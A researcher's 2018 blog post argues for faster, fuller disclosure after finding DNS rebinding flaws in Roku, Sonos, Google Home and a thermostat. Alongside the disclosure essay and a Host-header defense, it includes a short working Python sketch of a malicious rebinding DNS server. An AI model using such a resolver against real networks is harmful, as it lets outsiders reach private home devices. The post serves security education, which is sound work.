Going Public Fast: Thoughts on Disclosure Policy

Brannon Dorsey
7 min read · Jun 19, 2018


Today, I’m publishing my first official security advisory. I’ve spent the past three months exploring DNS rebinding: learning about it, writing tools to exploit it, and discovering vulnerabilities in IoT devices and services that can be targeted with it. That research led me to discover vulnerabilities in a slew of home entertainment and automation devices, including Google Home, Roku, Sonos Wi-Fi speakers, and a 🌡️ “smart” thermostat. Like independent security researchers before me, I learned that with the discovery of vulnerabilities affecting millions of users comes a great responsibility. I had a decision to make, and I found myself in search of a disclosure policy.

How would I share the information that I had discovered with the parties that it most affected and with the public?

Should I privately disclose the information to each vendor independently through coordinated disclosure, waiting patiently until they patched their systems before speaking about the bugs publicly? Or does the public deserve the information as quickly as possible, meaning I should instead opt for full disclosure? After weeks of consideration and back-and-forth with vendors and confidants in the security communities that I frequent, I opted for something in between. I want to share my experience because this was a decision I struggled to arrive at. Throughout the process I couldn’t help but feel that I was going against the grain, and my hope is that a recounting of my experience may be helpful to those who have felt the same, or to those who don’t yet have a dog in this race but, for one reason or another, will soon.

Before we enter the belly of the coordinated disclosure vs. full disclosure vs. some-nebulous-combination-of-the-two beast, I want to make it clear that when I first began to discover these vulnerabilities, it did not seem like I had a choice in the matter at all. From my experience participating in the hacker community primarily from the sidelines, the professional security folks seemed to have already cemented responsible disclosure as the standard policy. Before you go yelling at me for throwing yet another disclosure term at you, I want to clarify that responsible disclosure is coordinated disclosure. That synonymity reveals something very interesting about the one-sidedness of the disclosure policy debate. It’s a name that I particularly dislike and refuse to use, as it implies that anything other than responsible disclosure is inherently irresponsible. In my experience going to security conferences and participating in infosec Twitter, coordinated disclosure is the only publicly supported disclosure practice. I don’t mean to say that there aren’t proponents of alternative policies, but their presence is sparse enough that in my three years in the community, coordinated disclosure seemed like the default. So much so that as I began to consider full disclosure, I feared (and still fear) social backlash.

Naturally, as I discovered vulnerabilities during my research, I did what the industry had taught me and contacted the vendors of the devices. One at a time, I reported the vulnerabilities using online disclosure forms and both plaintext and PGP-encrypted email, depending on each vendor’s preferred method of notification. To their credit, Sonos was quick to respond, receptive to my report, and began working on a patch immediately. Roku took a bit more convincing, but after I described a detailed attack scenario they said they had stalled an update to RokuOS 8.1 to investigate the bug and expected a patch to be released in three to four months. To my surprise, Google was completely unresponsive to my report; I submitted my findings through their official bug bounty form twice over two weeks but never heard anything from them. Unsurprisingly, the small Radio Thermostat Company of America didn’t reply to any of my emails.

As weeks passed, I began to think more about the situation I was engaged in. What role was I playing, and what were the dynamics of my relationship with these vendors and the general public? Was I serving the companies themselves or the consumers affected by their negligence in defending against a ten-year-old vulnerability? What was the nature of the exchange?

I couldn’t help but feel that the process I was engaged in was flawed. I had conducted the research, found the vulnerabilities, and notified the vendors, and I was now at the mercy of their response, or lack thereof. Because I was playing by the rules, the vendors were in a comfortable position to control the information, their response to it, and in turn the public’s response. Bountyless coordinated disclosure has created a status quo that leverages independent security research as a form of free labor. Researchers find vulnerabilities, deliver them to vendors on a silver platter, and are then subject to their response. If and when the company fixes the problem, it has the opportunity to announce the update as a dedication to security and a celebration of collaboration. At best this is a PR success, or at least the opportunity to shove bad PR under the rug, as the security advisory gets published only after a patch has been released. I hate to say it, but it’s hard to get the public riled up about something that no longer affects them.

I couldn’t help but return to the thought that the modern coordinated disclosure model turns bad security into positive PR: positive PR and security advisories that celebrate years of negligence under the guise of “swift response,” which keep public outrage at bay. If more noise were made about smart toaster vulnerabilities, consumers would probably think twice before buying a smart toaster, and smart toaster companies would have to build security into their business model.

In his essay on the subject, Bruce Schneier makes the case for full disclosure:

Full disclosure — the practice of making the details of security vulnerabilities public — is a damned good idea. Public scrutiny is the only reliable way to improve security, while secrecy only makes us less secure.

I was a kid during the ’90s, the “golden years” of hacking, when the debate between full disclosure and coordinated disclosure seemed to hit its peak. It was news to me that full disclosure used to be the norm and that coordinated disclosure emerged almost as a response to challenge that norm. According to Schneier, coordinated disclosure can exist only because of the threat of full disclosure.

This rationale made a lot of sense to me, so I decided to borrow from it in my own experience with Roku. After being told that Roku would likely not have a patch for several months, I sent their security team an email indicating that I was working with a WIRED reporter, that we were leaning towards publishing the research publicly sooner rather than later, and that we might choose to proceed with full disclosure. The next morning I received notification that Roku had begun rolling out a patch to over 20 million devices in a firmware upgrade. If that isn’t a testament to the success of full disclosure, or at least the threat of it, I don’t know what is.

I want to make very clear that my support for engaging in full disclosure more frequently is not offered lightly, nor recklessly. The choice of a disclosure policy is situational, and I’d argue that it can be fluid. My findings around DNS rebinding presented a good occasion to favor full disclosure, because vulnerability to this type of attack is a systemic problem and one that has been known for over a decade. With the IoT devices that I was targeting, the vulnerabilities led to information leakage, denial of service, and rick-roll style tomfoolery. It was the combination of these factors (weakness to a ten-year-old attack, limited damages, potentially thousands of unique products that are vulnerable, and the initial response from a few vendors) that led me to transition from an initial policy of coordinated disclosure towards one that looks more like the full disclosure policies of ages past.
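For readers unfamiliar with the mechanics, the attack boils down to a malicious DNS server that changes its answer between lookups. Here is a minimal sketch of that idea using the third-party dnslib Python package; the IP addresses, the one-second TTL, and the resolver logic are illustrative assumptions, not the tooling I actually built.

    # Sketch of a rebinding DNS server: the first lookup for a name
    # resolves to the attacker's web server, and every later lookup
    # resolves to a device on the victim's LAN. A short TTL pushes the
    # browser to re-resolve quickly. (Binding port 53 needs root.)
    from dnslib import A, QTYPE, RR
    from dnslib.server import BaseResolver, DNSServer

    class RebindingResolver(BaseResolver):
        def __init__(self, attacker_ip, target_ip):
            self.attacker_ip = attacker_ip  # hypothetical public server
            self.target_ip = target_ip      # hypothetical LAN device
            self.seen = set()

        def resolve(self, request, handler):
            qname = str(request.q.qname)
            # First query gets the attacker's IP; repeats get the target's.
            ip = self.target_ip if qname in self.seen else self.attacker_ip
            self.seen.add(qname)
            reply = request.reply()
            reply.add_answer(RR(request.q.qname, QTYPE.A, rdata=A(ip), ttl=1))
            return reply

    DNSServer(RebindingResolver("203.0.113.7", "192.168.1.50"), port=53).start()

Once the cached answer expires and the name rebinds, JavaScript loaded from the attacker’s page can make requests that land on the internal device, while the browser’s same-origin policy still sees a single, unchanged origin.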

Different classes of vulnerabilities may deserve different disclosure policies, some of which may not fit into the cookie-cutter mold we’ve created to talk about them. Take, for example, the great 2008 DNS cache poisoning revelations. Dan Kaminsky and a great many engineers worked to successfully control the information and patch a flawed DNS spec. Had that disclosure been handled differently, millions of people could have had their bank accounts emptied.

Where I’m going with all of this is that researchers have a choice in how they disclose the information they discover, and great influence comes with that choice. They can maintain agency and autonomy in an exchange that is often delicate, consequential, and selfless. They can exercise a duty to the public in a way that may inconvenience a vendor or challenge the coordinated disclosure practices and norms of today, and that’s OK.

Systemic security problems like DNS rebinding aren’t going to be solved by independently approaching hundreds of companies and wrestling them into patching. They’ll be solved by raising awareness of the attack vector at large and by educating developers about the problem, so that the next ten years of products won’t have the same problems as the last ten. That’s why, at least in this case, I’ve opted to publish my research in the open, with particular emphasis on documentation, examples, and resources, and to publish it fast!
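In that spirit of developer education, the textbook defense is mercifully simple: after a rebind, the browser still sends the attacker’s domain in the HTTP Host header, so a local service can refuse any hostname it doesn’t recognize. Here is a minimal sketch using only Python’s standard library; the whitelist and port number are assumptions for illustration.

    # Sketch of the standard DNS rebinding defense for a local HTTP
    # service: reject requests whose Host header isn't one we expect.
    from http.server import BaseHTTPRequestHandler, HTTPServer

    ALLOWED_HOSTS = {"localhost:8080", "192.168.1.50:8080"}  # illustrative

    class RebindSafeHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            # A rebound request carries the attacker's domain as its Host
            # header, so this check stops it before any private API runs.
            if self.headers.get("Host") not in ALLOWED_HOSTS:
                self.send_error(403, "Unrecognized Host header")
                return
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"hello from the local device")

    HTTPServer(("0.0.0.0", 8080), RebindSafeHandler).serve_forever()

It is a handful of lines, which is exactly the point: the fix is cheap once developers know the attack exists.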
